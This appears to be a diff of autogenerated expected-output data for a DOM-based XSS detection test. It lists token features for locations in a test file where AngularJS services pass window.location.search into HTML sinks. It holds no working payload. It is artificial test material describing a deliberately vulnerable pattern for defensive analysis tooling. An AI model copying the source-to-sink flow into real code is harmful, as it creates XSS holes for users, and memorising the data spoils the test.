    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | functio ... earch } | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | functio ... earch } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:158:20:158:63 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:45 | window | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:45 | window | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:45 | window | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:45 | window | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:45 | window | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:54 | window.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:54 | window.location | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:54 | window.location | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:54 | window.location | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:54 | window.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:61 | window. ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:61 | window. ... .search | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:61 | window. ... .search | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:61 | window. ... .search | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:158:40:158:61 | window. ... .search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:158:47:158:54 | location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:158:47:158:54 | location | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:158:47:158:54 | location | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:158:47:158:54 | location | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:158:47:158:54 | location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:158:56:158:61 | search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:158:56:158:61 | search | contextSurroundingFunctionParameters | ()\n()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:158:56:158:61 | search | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:158:56:158:61 | search | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:158:56:158:61 | search | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:161:10:161:16 | factory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:10:161:16 | factory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:161:10:161:16 | factory | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:10:161:16 | factory | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:161:10:161:16 | factory | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:161:18:161:44 | "innoce ... ervice" | CalleeFlexibleAccessPath | angular.module().factory().factory().factory().factory().factory | | autogenerated/Xss/DomBasedXss/tst.js:161:18:161:44 | "innoce ... ervice" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:161:18:161:44 | "innoce ... ervice" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16673,15 +115549,82 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:161:47:163:10 | ["xssSi ... }] | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:161:47:163:10 | ["xssSi ... }] | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:161:48:161:64 | "xssSinkService2" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:48:161:64 | "xssSinkService2" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:48:161:64 | "xssSinkService2" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:161:48:161:64 | "xssSinkService2" | contextSurroundingFunctionParameters | () | | autogenerated/Xss/DomBasedXss/tst.js:161:48:161:64 | "xssSinkService2" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:48:161:64 | "xssSinkService2" | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:48:161:64 | "xssSinkService2" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:161:48:161:64 | "xssSinkService2" | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:161:48:161:64 | "xssSinkService2" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:161:48:161:64 | "xssSinkService2" | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:161:66 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:161:66 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:161:66 | this | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:161:66 | this | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:161:66 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | 'arguments' object of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | 'arguments' object of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | exceptional return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | exceptional return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | functio ... } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | functio ... } | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | functio ... } | contextSurroundingFunctionParameters | ()\n(xssSinkService2) | | autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | functio ... } | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | functio ... } | enclosingFunctionName | angularJSServices | | autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | functio ... } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | return of anonymous function | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | return of anonymous function | enclosingFunctionName | angularJSServices | +| autogenerated/Xss/DomBasedXss/tst.js:161:67:163:9 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:161:76:161:90 | xssSinkService2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:76:161:90 | xssSinkService2 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:161:76:161:90 | xssSinkService2 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:161:76:161:90 | xssSinkService2 | contextSurroundingFunctionParameters | ()\n(xssSinkService2) | +| autogenerated/Xss/DomBasedXss/tst.js:161:76:161:90 | xssSinkService2 | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
    html innocentSourceService factory innocentSourceService innocent | +| autogenerated/Xss/DomBasedXss/tst.js:161:76:161:90 | xssSinkService2 | enclosingFunctionBody | angular module myApp factory xssSource_to_service xssSinkService1 xssSinkService1 xssSinkService1 window location search factory xssSinkService1 v $
    html v factory xssSource_from_service xssSourceService xssSourceService $
    html xssSourceService factory xssSourceService window location search factory innocentSource_to_service xssSinkService2 xssSinkService2 xssSinkService2 innocent factory xssSinkService2 v $
    html v factory innocentSource_from_service innocentSourceService innocentSourceService $
